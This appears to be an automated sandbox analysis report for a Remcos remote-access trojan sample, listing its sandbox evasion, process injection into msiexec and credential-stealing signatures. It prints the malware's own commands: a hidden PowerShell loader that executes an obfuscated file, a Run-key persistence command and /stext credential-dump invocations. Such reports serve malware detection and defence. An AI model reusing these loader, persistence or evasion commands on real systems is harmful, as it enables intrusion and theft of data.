              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect Any.run
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: powershell.exe, 00000002.00000002.144031424446.00000000089BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXETAMPP
              Source: powershell.exe, 00000002.00000002.144025287826.0000000006F00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892443285.0000000006D40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: `BC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9871Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-22173
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.4 %
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5004Thread sleep count: 272 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5004Thread sleep time: -136000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2088Thread sleep time: -33000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7820Thread sleep count: 39 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2088Thread sleep count: 9376 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2088Thread sleep time: -28128000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D5C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_214D5C00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D7E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_214D7E20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D73F0 FindFirstFileW,FindNextFileW,LdrInitializeThunk,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,4_2_214D73F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214E8AD0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_214E8AD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_21DE10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_21DE6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Jump to behavior
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: powershell.exe, 00000002.00000002.144025287826.0000000006F00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892443285.0000000006D40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: `bC:\Program Files\Qemu-ga\qemu-ga.exe
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXk
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: powershell.exe, 00000002.00000002.144031424446.00000000089BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exetampp
              Source: msiexec.exe, 00000004.00000003.144377806392.0000000005479000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.0000000005479000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144309224409.0000014B7C7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msedge.exe, 0000000F.00000002.144309130186.0000014B7C780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSCTFIME Composition{|K
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: msedge.exe, 0000000F.00000002.144307250595.0000014B7A861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: chrome.exe, 00000008.00000002.144250991342.0000022E9823B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\rPO3799039985.exeAPI call chain: ExitProcess graph end nodegraph_0-3269
              Source: C:\Users\user\Desktop\rPO3799039985.exeAPI call chain: ExitProcess graph end nodegraph_0-3108
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0310F288 LdrInitializeThunk,LdrInitializeThunk,2_2_0310F288
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DD8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_214DD8D1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D7240 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_214D7240
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214E4BBC mov eax, dword ptr fs:[00000030h]4_2_214E4BBC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE4AB4 mov eax, dword ptr fs:[00000030h]4_2_21DE4AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214E9ACA GetProcessHeap,4_2_214E9ACA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DD8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_214DD8D1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DB299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_214DB299
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DAFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_214DAFD4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_21DE60E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_21DE2B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_21DE2639
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe protection: readonlyJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 44F0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"Jump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$polysaccum=get-content -raw 'c:\users\user\appdata\local\temp\badefaciliteter140\head158\rekvireringen\martyrization.pra121';$sikkerhedsforvaringernes=$polysaccum.substring(72097,3);.$sikkerhedsforvaringernes($polysaccum)
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$polysaccum=get-content -raw 'c:\users\user\appdata\local\temp\badefaciliteter140\head158\rekvireringen\martyrization.pra121';$sikkerhedsforvaringernes=$polysaccum.substring(72097,3);.$sikkerhedsforvaringernes($polysaccum)Jump to behavior
              Source: msiexec.exe, 00000004.00000003.144282569445.0000000021204000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144285024382.0000000021204000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144281842172.0000000021204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager 1 - Microsoft
              Source: msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernutes }
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
              Source: msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr]
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: msiexec.exe, 00000004.00000002.148899338985.0000000021204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL.)?
              Source: msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes }
              Source: msiexec.exe, 00000004.00000002.148899338985.0000000021204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX.
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWQ\/
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: msiexec.exe, 00000004.00000002.148899338985.0000000021204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS.
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWQ\
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DAE1D cpuid 4_2_214DAE1D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DB15B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_214DB15B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,10_2_004082CD
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
